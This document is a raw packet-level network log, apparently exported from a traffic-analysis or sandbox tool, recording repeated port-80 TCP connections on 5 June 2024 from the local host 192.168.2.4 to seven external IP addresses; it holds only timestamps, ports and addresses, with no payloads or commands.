Jun 5, 2024 15:06:52.389816046 CEST	80	49763	162.0.237.22	192.168.2.4
Jun 5, 2024 15:06:52.389903069 CEST	49763	80	192.168.2.4	162.0.237.22
Jun 5, 2024 15:06:52.392635107 CEST	49763	80	192.168.2.4	162.0.237.22
Jun 5, 2024 15:06:52.397665977 CEST	80	49763	162.0.237.22	192.168.2.4
Jun 5, 2024 15:06:52.397726059 CEST	80	49763	162.0.237.22	192.168.2.4
Jun 5, 2024 15:06:52.397754908 CEST	80	49763	162.0.237.22	192.168.2.4
Jun 5, 2024 15:06:52.397784948 CEST	80	49763	162.0.237.22	192.168.2.4
Jun 5, 2024 15:06:52.397916079 CEST	80	49763	162.0.237.22	192.168.2.4
Jun 5, 2024 15:06:52.397943974 CEST	80	49763	162.0.237.22	192.168.2.4
Jun 5, 2024 15:06:52.397970915 CEST	80	49763	162.0.237.22	192.168.2.4
Jun 5, 2024 15:06:52.398020983 CEST	80	49763	162.0.237.22	192.168.2.4
Jun 5, 2024 15:06:52.398049116 CEST	80	49763	162.0.237.22	192.168.2.4
Jun 5, 2024 15:06:53.051278114 CEST	80	49763	162.0.237.22	192.168.2.4
Jun 5, 2024 15:06:53.083580971 CEST	80	49763	162.0.237.22	192.168.2.4
Jun 5, 2024 15:06:53.083642960 CEST	49763	80	192.168.2.4	162.0.237.22
Jun 5, 2024 15:06:53.895776987 CEST	49763	80	192.168.2.4	162.0.237.22
Jun 5, 2024 15:06:54.915070057 CEST	49764	80	192.168.2.4	162.0.237.22
Jun 5, 2024 15:06:54.920227051 CEST	80	49764	162.0.237.22	192.168.2.4
Jun 5, 2024 15:06:54.920320034 CEST	49764	80	192.168.2.4	162.0.237.22
Jun 5, 2024 15:06:54.922157049 CEST	49764	80	192.168.2.4	162.0.237.22
Jun 5, 2024 15:06:54.927148104 CEST	80	49764	162.0.237.22	192.168.2.4
Jun 5, 2024 15:06:55.589430094 CEST	80	49764	162.0.237.22	192.168.2.4
Jun 5, 2024 15:06:55.622143030 CEST	80	49764	162.0.237.22	192.168.2.4
Jun 5, 2024 15:06:55.622297049 CEST	49764	80	192.168.2.4	162.0.237.22
Jun 5, 2024 15:06:55.623121977 CEST	49764	80	192.168.2.4	162.0.237.22
Jun 5, 2024 15:06:55.628146887 CEST	80	49764	162.0.237.22	192.168.2.4
Jun 5, 2024 15:07:09.518178940 CEST	49765	80	192.168.2.4	136.143.186.12
Jun 5, 2024 15:07:09.523637056 CEST	80	49765	136.143.186.12	192.168.2.4
Jun 5, 2024 15:07:09.525166988 CEST	49765	80	192.168.2.4	136.143.186.12
Jun 5, 2024 15:07:09.527378082 CEST	49765	80	192.168.2.4	136.143.186.12
Jun 5, 2024 15:07:09.532577038 CEST	80	49765	136.143.186.12	192.168.2.4
Jun 5, 2024 15:07:10.268218994 CEST	80	49765	136.143.186.12	192.168.2.4
Jun 5, 2024 15:07:10.268280983 CEST	80	49765	136.143.186.12	192.168.2.4
Jun 5, 2024 15:07:10.268351078 CEST	49765	80	192.168.2.4	136.143.186.12
Jun 5, 2024 15:07:10.339879990 CEST	80	49765	136.143.186.12	192.168.2.4
Jun 5, 2024 15:07:10.339956999 CEST	49765	80	192.168.2.4	136.143.186.12
Jun 5, 2024 15:07:11.036473989 CEST	49765	80	192.168.2.4	136.143.186.12
Jun 5, 2024 15:07:12.059566975 CEST	49766	80	192.168.2.4	136.143.186.12
Jun 5, 2024 15:07:12.065454960 CEST	80	49766	136.143.186.12	192.168.2.4
Jun 5, 2024 15:07:12.069081068 CEST	49766	80	192.168.2.4	136.143.186.12
Jun 5, 2024 15:07:12.072952986 CEST	49766	80	192.168.2.4	136.143.186.12
Jun 5, 2024 15:07:12.078427076 CEST	80	49766	136.143.186.12	192.168.2.4
Jun 5, 2024 15:07:12.822194099 CEST	80	49766	136.143.186.12	192.168.2.4
Jun 5, 2024 15:07:12.822225094 CEST	80	49766	136.143.186.12	192.168.2.4
Jun 5, 2024 15:07:12.822268009 CEST	49766	80	192.168.2.4	136.143.186.12
Jun 5, 2024 15:07:12.898216009 CEST	80	49766	136.143.186.12	192.168.2.4
Jun 5, 2024 15:07:12.898360014 CEST	49766	80	192.168.2.4	136.143.186.12
Jun 5, 2024 15:07:13.586082935 CEST	49766	80	192.168.2.4	136.143.186.12
Jun 5, 2024 15:07:14.602894068 CEST	49767	80	192.168.2.4	136.143.186.12
Jun 5, 2024 15:07:14.608103991 CEST	80	49767	136.143.186.12	192.168.2.4
Jun 5, 2024 15:07:14.608175039 CEST	49767	80	192.168.2.4	136.143.186.12
Jun 5, 2024 15:07:14.610538960 CEST	49767	80	192.168.2.4	136.143.186.12
Jun 5, 2024 15:07:14.615657091 CEST	80	49767	136.143.186.12	192.168.2.4
Jun 5, 2024 15:07:14.615700960 CEST	80	49767	136.143.186.12	192.168.2.4
Jun 5, 2024 15:07:14.615781069 CEST	80	49767	136.143.186.12	192.168.2.4
Jun 5, 2024 15:07:14.615828037 CEST	80	49767	136.143.186.12	192.168.2.4
Jun 5, 2024 15:07:14.615842104 CEST	80	49767	136.143.186.12	192.168.2.4
Jun 5, 2024 15:07:14.615987062 CEST	80	49767	136.143.186.12	192.168.2.4
Jun 5, 2024 15:07:14.616002083 CEST	80	49767	136.143.186.12	192.168.2.4
Jun 5, 2024 15:07:14.616099119 CEST	80	49767	136.143.186.12	192.168.2.4
Jun 5, 2024 15:07:14.616111040 CEST	80	49767	136.143.186.12	192.168.2.4
Jun 5, 2024 15:07:15.348826885 CEST	80	49767	136.143.186.12	192.168.2.4
Jun 5, 2024 15:07:15.399580002 CEST	49767	80	192.168.2.4	136.143.186.12
Jun 5, 2024 15:07:15.416506052 CEST	80	49767	136.143.186.12	192.168.2.4
Jun 5, 2024 15:07:15.417004108 CEST	49767	80	192.168.2.4	136.143.186.12
Jun 5, 2024 15:07:16.114701986 CEST	49767	80	192.168.2.4	136.143.186.12
Jun 5, 2024 15:07:17.133734941 CEST	49768	80	192.168.2.4	136.143.186.12
Jun 5, 2024 15:07:17.138911009 CEST	80	49768	136.143.186.12	192.168.2.4
Jun 5, 2024 15:07:17.139014959 CEST	49768	80	192.168.2.4	136.143.186.12
Jun 5, 2024 15:07:17.141134977 CEST	49768	80	192.168.2.4	136.143.186.12
Jun 5, 2024 15:07:17.146189928 CEST	80	49768	136.143.186.12	192.168.2.4
Jun 5, 2024 15:07:17.882740021 CEST	80	49768	136.143.186.12	192.168.2.4
Jun 5, 2024 15:07:17.882798910 CEST	80	49768	136.143.186.12	192.168.2.4
Jun 5, 2024 15:07:17.882833958 CEST	80	49768	136.143.186.12	192.168.2.4
Jun 5, 2024 15:07:17.882870913 CEST	80	49768	136.143.186.12	192.168.2.4
Jun 5, 2024 15:07:17.882901907 CEST	80	49768	136.143.186.12	192.168.2.4
Jun 5, 2024 15:07:17.882905006 CEST	49768	80	192.168.2.4	136.143.186.12
Jun 5, 2024 15:07:17.882931948 CEST	49768	80	192.168.2.4	136.143.186.12
Jun 5, 2024 15:07:17.927077055 CEST	49768	80	192.168.2.4	136.143.186.12
Jun 5, 2024 15:07:17.952368975 CEST	80	49768	136.143.186.12	192.168.2.4
Jun 5, 2024 15:07:17.952502966 CEST	49768	80	192.168.2.4	136.143.186.12
Jun 5, 2024 15:07:17.956967115 CEST	49768	80	192.168.2.4	136.143.186.12
Jun 5, 2024 15:07:17.961958885 CEST	80	49768	136.143.186.12	192.168.2.4
Jun 5, 2024 15:07:31.245357990 CEST	49769	80	192.168.2.4	103.168.172.37
Jun 5, 2024 15:07:31.250370979 CEST	80	49769	103.168.172.37	192.168.2.4
Jun 5, 2024 15:07:31.250456095 CEST	49769	80	192.168.2.4	103.168.172.37
Jun 5, 2024 15:07:31.252003908 CEST	49769	80	192.168.2.4	103.168.172.37
Jun 5, 2024 15:07:31.256881952 CEST	80	49769	103.168.172.37	192.168.2.4
Jun 5, 2024 15:07:31.933795929 CEST	80	49769	103.168.172.37	192.168.2.4
Jun 5, 2024 15:07:31.977943897 CEST	80	49769	103.168.172.37	192.168.2.4
Jun 5, 2024 15:07:31.979257107 CEST	49769	80	192.168.2.4	103.168.172.37
Jun 5, 2024 15:07:32.755361080 CEST	49769	80	192.168.2.4	103.168.172.37
Jun 5, 2024 15:07:33.866388083 CEST	49770	80	192.168.2.4	103.168.172.37
Jun 5, 2024 15:07:33.871573925 CEST	80	49770	103.168.172.37	192.168.2.4
Jun 5, 2024 15:07:33.874433041 CEST	49770	80	192.168.2.4	103.168.172.37
Jun 5, 2024 15:07:33.876705885 CEST	49770	80	192.168.2.4	103.168.172.37
Jun 5, 2024 15:07:33.881596088 CEST	80	49770	103.168.172.37	192.168.2.4
Jun 5, 2024 15:07:34.552422047 CEST	80	49770	103.168.172.37	192.168.2.4
Jun 5, 2024 15:07:34.596684933 CEST	80	49770	103.168.172.37	192.168.2.4
Jun 5, 2024 15:07:34.596872091 CEST	49770	80	192.168.2.4	103.168.172.37
Jun 5, 2024 15:07:35.381679058 CEST	49770	80	192.168.2.4	103.168.172.37
Jun 5, 2024 15:07:36.401540995 CEST	49771	80	192.168.2.4	103.168.172.37
Jun 5, 2024 15:07:36.406625032 CEST	80	49771	103.168.172.37	192.168.2.4
Jun 5, 2024 15:07:36.406706095 CEST	49771	80	192.168.2.4	103.168.172.37
Jun 5, 2024 15:07:36.409290075 CEST	49771	80	192.168.2.4	103.168.172.37
Jun 5, 2024 15:07:36.414268017 CEST	80	49771	103.168.172.37	192.168.2.4
Jun 5, 2024 15:07:36.414352894 CEST	80	49771	103.168.172.37	192.168.2.4
Jun 5, 2024 15:07:36.414382935 CEST	80	49771	103.168.172.37	192.168.2.4
Jun 5, 2024 15:07:36.414438009 CEST	80	49771	103.168.172.37	192.168.2.4
Jun 5, 2024 15:07:36.414467096 CEST	80	49771	103.168.172.37	192.168.2.4
Jun 5, 2024 15:07:36.414499998 CEST	80	49771	103.168.172.37	192.168.2.4
Jun 5, 2024 15:07:36.414526939 CEST	80	49771	103.168.172.37	192.168.2.4
Jun 5, 2024 15:07:36.414625883 CEST	80	49771	103.168.172.37	192.168.2.4
Jun 5, 2024 15:07:36.414659023 CEST	80	49771	103.168.172.37	192.168.2.4
Jun 5, 2024 15:07:37.081274033 CEST	80	49771	103.168.172.37	192.168.2.4
Jun 5, 2024 15:07:37.126233101 CEST	80	49771	103.168.172.37	192.168.2.4
Jun 5, 2024 15:07:37.126395941 CEST	49771	80	192.168.2.4	103.168.172.37
Jun 5, 2024 15:07:37.915657997 CEST	49771	80	192.168.2.4	103.168.172.37
Jun 5, 2024 15:07:38.930707932 CEST	49772	80	192.168.2.4	103.168.172.37
Jun 5, 2024 15:07:38.935955048 CEST	80	49772	103.168.172.37	192.168.2.4
Jun 5, 2024 15:07:38.936047077 CEST	49772	80	192.168.2.4	103.168.172.37
Jun 5, 2024 15:07:38.937741041 CEST	49772	80	192.168.2.4	103.168.172.37
Jun 5, 2024 15:07:38.942707062 CEST	80	49772	103.168.172.37	192.168.2.4
Jun 5, 2024 15:07:39.614197016 CEST	80	49772	103.168.172.37	192.168.2.4
Jun 5, 2024 15:07:39.658220053 CEST	80	49772	103.168.172.37	192.168.2.4
Jun 5, 2024 15:07:39.658477068 CEST	49772	80	192.168.2.4	103.168.172.37
Jun 5, 2024 15:07:39.659199953 CEST	49772	80	192.168.2.4	103.168.172.37
Jun 5, 2024 15:07:39.664078951 CEST	80	49772	103.168.172.37	192.168.2.4
Jun 5, 2024 15:07:44.727236032 CEST	49773	80	192.168.2.4	104.37.39.71
Jun 5, 2024 15:07:44.732280970 CEST	80	49773	104.37.39.71	192.168.2.4
Jun 5, 2024 15:07:44.732355118 CEST	49773	80	192.168.2.4	104.37.39.71
Jun 5, 2024 15:07:44.734158039 CEST	49773	80	192.168.2.4	104.37.39.71
Jun 5, 2024 15:07:44.739142895 CEST	80	49773	104.37.39.71	192.168.2.4
Jun 5, 2024 15:07:45.615015984 CEST	80	49773	104.37.39.71	192.168.2.4
Jun 5, 2024 15:07:45.661668062 CEST	49773	80	192.168.2.4	104.37.39.71
Jun 5, 2024 15:07:45.755176067 CEST	80	49773	104.37.39.71	192.168.2.4
Jun 5, 2024 15:07:45.757175922 CEST	49773	80	192.168.2.4	104.37.39.71
Jun 5, 2024 15:07:46.239932060 CEST	49773	80	192.168.2.4	104.37.39.71
Jun 5, 2024 15:07:47.258006096 CEST	49774	80	192.168.2.4	104.37.39.71
Jun 5, 2024 15:07:47.263211012 CEST	80	49774	104.37.39.71	192.168.2.4
Jun 5, 2024 15:07:47.263295889 CEST	49774	80	192.168.2.4	104.37.39.71
Jun 5, 2024 15:07:47.264890909 CEST	49774	80	192.168.2.4	104.37.39.71
Jun 5, 2024 15:07:47.270354033 CEST	80	49774	104.37.39.71	192.168.2.4
Jun 5, 2024 15:07:48.112588882 CEST	80	49774	104.37.39.71	192.168.2.4
Jun 5, 2024 15:07:48.161624908 CEST	49774	80	192.168.2.4	104.37.39.71
Jun 5, 2024 15:07:48.236514091 CEST	80	49774	104.37.39.71	192.168.2.4
Jun 5, 2024 15:07:48.236608982 CEST	49774	80	192.168.2.4	104.37.39.71
Jun 5, 2024 15:07:48.771078110 CEST	49774	80	192.168.2.4	104.37.39.71
Jun 5, 2024 15:07:49.790527105 CEST	49775	80	192.168.2.4	104.37.39.71
Jun 5, 2024 15:07:49.795799971 CEST	80	49775	104.37.39.71	192.168.2.4
Jun 5, 2024 15:07:49.796070099 CEST	49775	80	192.168.2.4	104.37.39.71
Jun 5, 2024 15:07:49.799115896 CEST	49775	80	192.168.2.4	104.37.39.71
Jun 5, 2024 15:07:49.804131031 CEST	80	49775	104.37.39.71	192.168.2.4
Jun 5, 2024 15:07:49.804164886 CEST	80	49775	104.37.39.71	192.168.2.4
Jun 5, 2024 15:07:49.804218054 CEST	80	49775	104.37.39.71	192.168.2.4
Jun 5, 2024 15:07:49.804244995 CEST	80	49775	104.37.39.71	192.168.2.4
Jun 5, 2024 15:07:49.804312944 CEST	80	49775	104.37.39.71	192.168.2.4
Jun 5, 2024 15:07:49.804342031 CEST	80	49775	104.37.39.71	192.168.2.4
Jun 5, 2024 15:07:49.804373980 CEST	80	49775	104.37.39.71	192.168.2.4
Jun 5, 2024 15:07:49.804420948 CEST	80	49775	104.37.39.71	192.168.2.4
Jun 5, 2024 15:07:49.804449081 CEST	80	49775	104.37.39.71	192.168.2.4
Jun 5, 2024 15:07:50.653172970 CEST	80	49775	104.37.39.71	192.168.2.4
Jun 5, 2024 15:07:50.708504915 CEST	49775	80	192.168.2.4	104.37.39.71
Jun 5, 2024 15:07:50.778126955 CEST	80	49775	104.37.39.71	192.168.2.4
Jun 5, 2024 15:07:50.778192997 CEST	49775	80	192.168.2.4	104.37.39.71
Jun 5, 2024 15:07:51.302294016 CEST	49775	80	192.168.2.4	104.37.39.71
Jun 5, 2024 15:07:52.323190928 CEST	49776	80	192.168.2.4	104.37.39.71
Jun 5, 2024 15:07:52.328479052 CEST	80	49776	104.37.39.71	192.168.2.4
Jun 5, 2024 15:07:52.328617096 CEST	49776	80	192.168.2.4	104.37.39.71
Jun 5, 2024 15:07:52.330377102 CEST	49776	80	192.168.2.4	104.37.39.71
Jun 5, 2024 15:07:52.335680962 CEST	80	49776	104.37.39.71	192.168.2.4
Jun 5, 2024 15:07:53.171087027 CEST	80	49776	104.37.39.71	192.168.2.4
Jun 5, 2024 15:07:53.224245071 CEST	49776	80	192.168.2.4	104.37.39.71
Jun 5, 2024 15:07:53.295142889 CEST	80	49776	104.37.39.71	192.168.2.4
Jun 5, 2024 15:07:53.295380116 CEST	49776	80	192.168.2.4	104.37.39.71
Jun 5, 2024 15:07:53.296005964 CEST	49776	80	192.168.2.4	104.37.39.71
Jun 5, 2024 15:07:53.301110029 CEST	80	49776	104.37.39.71	192.168.2.4
Jun 5, 2024 15:08:06.592149019 CEST	49777	80	192.168.2.4	199.59.243.225
Jun 5, 2024 15:08:06.597239017 CEST	80	49777	199.59.243.225	192.168.2.4
Jun 5, 2024 15:08:06.597317934 CEST	49777	80	192.168.2.4	199.59.243.225
Jun 5, 2024 15:08:06.599112988 CEST	49777	80	192.168.2.4	199.59.243.225
Jun 5, 2024 15:08:06.604021072 CEST	80	49777	199.59.243.225	192.168.2.4
Jun 5, 2024 15:08:07.217701912 CEST	80	49777	199.59.243.225	192.168.2.4
Jun 5, 2024 15:08:07.217731953 CEST	80	49777	199.59.243.225	192.168.2.4
Jun 5, 2024 15:08:07.217792034 CEST	49777	80	192.168.2.4	199.59.243.225
Jun 5, 2024 15:08:07.217941046 CEST	80	49777	199.59.243.225	192.168.2.4
Jun 5, 2024 15:08:07.217992067 CEST	49777	80	192.168.2.4	199.59.243.225
Jun 5, 2024 15:08:08.114922047 CEST	49777	80	192.168.2.4	199.59.243.225
Jun 5, 2024 15:08:09.132919073 CEST	49778	80	192.168.2.4	199.59.243.225
Jun 5, 2024 15:08:09.138011932 CEST	80	49778	199.59.243.225	192.168.2.4
Jun 5, 2024 15:08:09.138104916 CEST	49778	80	192.168.2.4	199.59.243.225
Jun 5, 2024 15:08:09.139584064 CEST	49778	80	192.168.2.4	199.59.243.225
Jun 5, 2024 15:08:09.144524097 CEST	80	49778	199.59.243.225	192.168.2.4
Jun 5, 2024 15:08:09.954148054 CEST	80	49778	199.59.243.225	192.168.2.4
Jun 5, 2024 15:08:09.954200029 CEST	80	49778	199.59.243.225	192.168.2.4
Jun 5, 2024 15:08:09.954242945 CEST	80	49778	199.59.243.225	192.168.2.4
Jun 5, 2024 15:08:09.954272985 CEST	80	49778	199.59.243.225	192.168.2.4
Jun 5, 2024 15:08:09.954385996 CEST	49778	80	192.168.2.4	199.59.243.225
Jun 5, 2024 15:08:09.954935074 CEST	49778	80	192.168.2.4	199.59.243.225
Jun 5, 2024 15:08:10.646152973 CEST	49778	80	192.168.2.4	199.59.243.225
Jun 5, 2024 15:08:11.669389009 CEST	49779	80	192.168.2.4	199.59.243.225
Jun 5, 2024 15:08:11.675704002 CEST	80	49779	199.59.243.225	192.168.2.4
Jun 5, 2024 15:08:11.677330017 CEST	49779	80	192.168.2.4	199.59.243.225
Jun 5, 2024 15:08:11.679203033 CEST	49779	80	192.168.2.4	199.59.243.225
Jun 5, 2024 15:08:11.684631109 CEST	80	49779	199.59.243.225	192.168.2.4
Jun 5, 2024 15:08:11.684676886 CEST	80	49779	199.59.243.225	192.168.2.4
Jun 5, 2024 15:08:11.684706926 CEST	80	49779	199.59.243.225	192.168.2.4
Jun 5, 2024 15:08:11.684735060 CEST	80	49779	199.59.243.225	192.168.2.4
Jun 5, 2024 15:08:11.684762955 CEST	80	49779	199.59.243.225	192.168.2.4
Jun 5, 2024 15:08:11.684819937 CEST	80	49779	199.59.243.225	192.168.2.4
Jun 5, 2024 15:08:11.684849024 CEST	80	49779	199.59.243.225	192.168.2.4
Jun 5, 2024 15:08:11.684875965 CEST	80	49779	199.59.243.225	192.168.2.4
Jun 5, 2024 15:08:11.684904099 CEST	80	49779	199.59.243.225	192.168.2.4
Jun 5, 2024 15:08:12.297831059 CEST	80	49779	199.59.243.225	192.168.2.4
Jun 5, 2024 15:08:12.297882080 CEST	80	49779	199.59.243.225	192.168.2.4
Jun 5, 2024 15:08:12.297924042 CEST	80	49779	199.59.243.225	192.168.2.4
Jun 5, 2024 15:08:12.298230886 CEST	49779	80	192.168.2.4	199.59.243.225
Jun 5, 2024 15:08:13.193089962 CEST	49779	80	192.168.2.4	199.59.243.225
Jun 5, 2024 15:08:14.211222887 CEST	49780	80	192.168.2.4	199.59.243.225
Jun 5, 2024 15:08:14.216212034 CEST	80	49780	199.59.243.225	192.168.2.4
Jun 5, 2024 15:08:14.221327066 CEST	49780	80	192.168.2.4	199.59.243.225
Jun 5, 2024 15:08:14.224941969 CEST	49780	80	192.168.2.4	199.59.243.225
Jun 5, 2024 15:08:14.229949951 CEST	80	49780	199.59.243.225	192.168.2.4
Jun 5, 2024 15:08:14.850076914 CEST	80	49780	199.59.243.225	192.168.2.4
Jun 5, 2024 15:08:14.850136995 CEST	80	49780	199.59.243.225	192.168.2.4
Jun 5, 2024 15:08:14.850214958 CEST	80	49780	199.59.243.225	192.168.2.4
Jun 5, 2024 15:08:14.850265026 CEST	49780	80	192.168.2.4	199.59.243.225
Jun 5, 2024 15:08:14.850313902 CEST	49780	80	192.168.2.4	199.59.243.225
Jun 5, 2024 15:08:14.857954979 CEST	49780	80	192.168.2.4	199.59.243.225
Jun 5, 2024 15:08:14.862886906 CEST	80	49780	199.59.243.225	192.168.2.4
Jun 5, 2024 15:08:44.461975098 CEST	49781	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:08:44.467346907 CEST	80	49781	162.241.216.140	192.168.2.4
Jun 5, 2024 15:08:44.467432976 CEST	49781	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:08:44.469264030 CEST	49781	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:08:44.474286079 CEST	80	49781	162.241.216.140	192.168.2.4
Jun 5, 2024 15:08:45.128328085 CEST	80	49781	162.241.216.140	192.168.2.4
Jun 5, 2024 15:08:45.160145044 CEST	80	49781	162.241.216.140	192.168.2.4
Jun 5, 2024 15:08:45.160224915 CEST	49781	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:08:45.975585938 CEST	49781	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:08:46.993026018 CEST	49782	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:08:46.998317003 CEST	80	49782	162.241.216.140	192.168.2.4
Jun 5, 2024 15:08:46.998398066 CEST	49782	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:08:47.000117064 CEST	49782	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:08:47.005050898 CEST	80	49782	162.241.216.140	192.168.2.4
Jun 5, 2024 15:08:47.664710999 CEST	80	49782	162.241.216.140	192.168.2.4
Jun 5, 2024 15:08:47.697367907 CEST	80	49782	162.241.216.140	192.168.2.4
Jun 5, 2024 15:08:47.697504044 CEST	49782	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:08:48.505712032 CEST	49782	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:08:49.526022911 CEST	49783	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:08:49.531131029 CEST	80	49783	162.241.216.140	192.168.2.4
Jun 5, 2024 15:08:49.533507109 CEST	49783	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:08:49.537096977 CEST	49783	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:08:49.542102098 CEST	80	49783	162.241.216.140	192.168.2.4
Jun 5, 2024 15:08:49.542120934 CEST	80	49783	162.241.216.140	192.168.2.4
Jun 5, 2024 15:08:49.542146921 CEST	80	49783	162.241.216.140	192.168.2.4
Jun 5, 2024 15:08:49.542160034 CEST	80	49783	162.241.216.140	192.168.2.4
Jun 5, 2024 15:08:49.542175055 CEST	80	49783	162.241.216.140	192.168.2.4
Jun 5, 2024 15:08:49.542257071 CEST	80	49783	162.241.216.140	192.168.2.4
Jun 5, 2024 15:08:49.542272091 CEST	80	49783	162.241.216.140	192.168.2.4
Jun 5, 2024 15:08:49.542332888 CEST	80	49783	162.241.216.140	192.168.2.4
Jun 5, 2024 15:08:49.542347908 CEST	80	49783	162.241.216.140	192.168.2.4
Jun 5, 2024 15:08:50.197731018 CEST	80	49783	162.241.216.140	192.168.2.4
Jun 5, 2024 15:08:50.230220079 CEST	80	49783	162.241.216.140	192.168.2.4
Jun 5, 2024 15:08:50.230376005 CEST	49783	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:08:51.037002087 CEST	49783	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:08:52.055196047 CEST	49784	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:08:52.060584068 CEST	80	49784	162.241.216.140	192.168.2.4
Jun 5, 2024 15:08:52.061603069 CEST	49784	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:08:52.065438032 CEST	49784	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:08:52.070657969 CEST	80	49784	162.241.216.140	192.168.2.4
Jun 5, 2024 15:08:52.719595909 CEST	80	49784	162.241.216.140	192.168.2.4
Jun 5, 2024 15:08:52.752031088 CEST	80	49784	162.241.216.140	192.168.2.4
Jun 5, 2024 15:08:52.752258062 CEST	49784	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:08:52.753154039 CEST	49784	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:08:52.758337975 CEST	80	49784	162.241.216.140	192.168.2.4
Jun 5, 2024 15:08:57.758718014 CEST	49785	80	192.168.2.4	57.151.38.169
Jun 5, 2024 15:08:57.764246941 CEST	80	49785	57.151.38.169	192.168.2.4
Jun 5, 2024 15:08:57.765645027 CEST	49785	80	192.168.2.4	57.151.38.169
Jun 5, 2024 15:08:57.769545078 CEST	49785	80	192.168.2.4	57.151.38.169
Jun 5, 2024 15:08:57.774856091 CEST	80	49785	57.151.38.169	192.168.2.4
Jun 5, 2024 15:08:58.432151079 CEST	80	49785	57.151.38.169	192.168.2.4
Jun 5, 2024 15:08:58.473347902 CEST	80	49785	57.151.38.169	192.168.2.4
Jun 5, 2024 15:08:58.473407984 CEST	49785	80	192.168.2.4	57.151.38.169
Jun 5, 2024 15:08:59.271368980 CEST	49785	80	192.168.2.4	57.151.38.169
Jun 5, 2024 15:09:00.290225983 CEST	49786	80	192.168.2.4	57.151.38.169
Jun 5, 2024 15:09:00.295607090 CEST	80	49786	57.151.38.169	192.168.2.4
Jun 5, 2024 15:09:00.297499895 CEST	49786	80	192.168.2.4	57.151.38.169
Jun 5, 2024 15:09:00.299212933 CEST	49786	80	192.168.2.4	57.151.38.169
Jun 5, 2024 15:09:00.304173946 CEST	80	49786	57.151.38.169	192.168.2.4
Jun 5, 2024 15:09:00.967647076 CEST	80	49786	57.151.38.169	192.168.2.4
Jun 5, 2024 15:09:01.007997990 CEST	80	49786	57.151.38.169	192.168.2.4
Jun 5, 2024 15:09:01.008055925 CEST	49786	80	192.168.2.4	57.151.38.169
Jun 5, 2024 15:09:01.803590059 CEST	49786	80	192.168.2.4	57.151.38.169
Jun 5, 2024 15:09:02.821542025 CEST	49787	80	192.168.2.4	57.151.38.169
Jun 5, 2024 15:09:02.826706886 CEST	80	49787	57.151.38.169	192.168.2.4
Jun 5, 2024 15:09:02.826792955 CEST	49787	80	192.168.2.4	57.151.38.169
Jun 5, 2024 15:09:02.828587055 CEST	49787	80	192.168.2.4	57.151.38.169
Jun 5, 2024 15:09:02.833699942 CEST	80	49787	57.151.38.169	192.168.2.4
Jun 5, 2024 15:09:02.833733082 CEST	80	49787	57.151.38.169	192.168.2.4
Jun 5, 2024 15:09:02.833765984 CEST	80	49787	57.151.38.169	192.168.2.4
Jun 5, 2024 15:09:02.833817959 CEST	80	49787	57.151.38.169	192.168.2.4
Jun 5, 2024 15:09:02.833853006 CEST	80	49787	57.151.38.169	192.168.2.4
Jun 5, 2024 15:09:02.834108114 CEST	80	49787	57.151.38.169	192.168.2.4
Jun 5, 2024 15:09:02.834141970 CEST	80	49787	57.151.38.169	192.168.2.4
Jun 5, 2024 15:09:02.834192038 CEST	80	49787	57.151.38.169	192.168.2.4
Jun 5, 2024 15:09:02.834248066 CEST	80	49787	57.151.38.169	192.168.2.4
Jun 5, 2024 15:09:03.485804081 CEST	80	49787	57.151.38.169	192.168.2.4
Jun 5, 2024 15:09:03.528033018 CEST	80	49787	57.151.38.169	192.168.2.4
Jun 5, 2024 15:09:03.528094053 CEST	49787	80	192.168.2.4	57.151.38.169
Jun 5, 2024 15:09:04.333935022 CEST	49787	80	192.168.2.4	57.151.38.169
Jun 5, 2024 15:09:05.742670059 CEST	49788	80	192.168.2.4	57.151.38.169
Jun 5, 2024 15:09:05.747987032 CEST	80	49788	57.151.38.169	192.168.2.4
Jun 5, 2024 15:09:05.748085976 CEST	49788	80	192.168.2.4	57.151.38.169
Jun 5, 2024 15:09:05.750122070 CEST	49788	80	192.168.2.4	57.151.38.169
Jun 5, 2024 15:09:05.755470991 CEST	80	49788	57.151.38.169	192.168.2.4
Jun 5, 2024 15:09:06.437405109 CEST	80	49788	57.151.38.169	192.168.2.4
Jun 5, 2024 15:09:06.478533983 CEST	80	49788	57.151.38.169	192.168.2.4
Jun 5, 2024 15:09:06.478632927 CEST	49788	80	192.168.2.4	57.151.38.169
Jun 5, 2024 15:09:06.479274988 CEST	49788	80	192.168.2.4	57.151.38.169
Jun 5, 2024 15:09:06.484177113 CEST	80	49788	57.151.38.169	192.168.2.4
Jun 5, 2024 15:09:11.492964983 CEST	49789	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:09:11.498323917 CEST	80	49789	162.241.216.140	192.168.2.4
Jun 5, 2024 15:09:11.498449087 CEST	49789	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:09:11.500533104 CEST	49789	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:09:11.505530119 CEST	80	49789	162.241.216.140	192.168.2.4
Jun 5, 2024 15:09:12.161384106 CEST	80	49789	162.241.216.140	192.168.2.4
Jun 5, 2024 15:09:12.194448948 CEST	80	49789	162.241.216.140	192.168.2.4
Jun 5, 2024 15:09:12.194631100 CEST	49789	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:09:13.005922079 CEST	49789	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:09:14.023699999 CEST	49790	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:09:14.028809071 CEST	80	49790	162.241.216.140	192.168.2.4
Jun 5, 2024 15:09:14.029576063 CEST	49790	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:09:14.031066895 CEST	49790	80	192.168.2.4	162.241.216.140
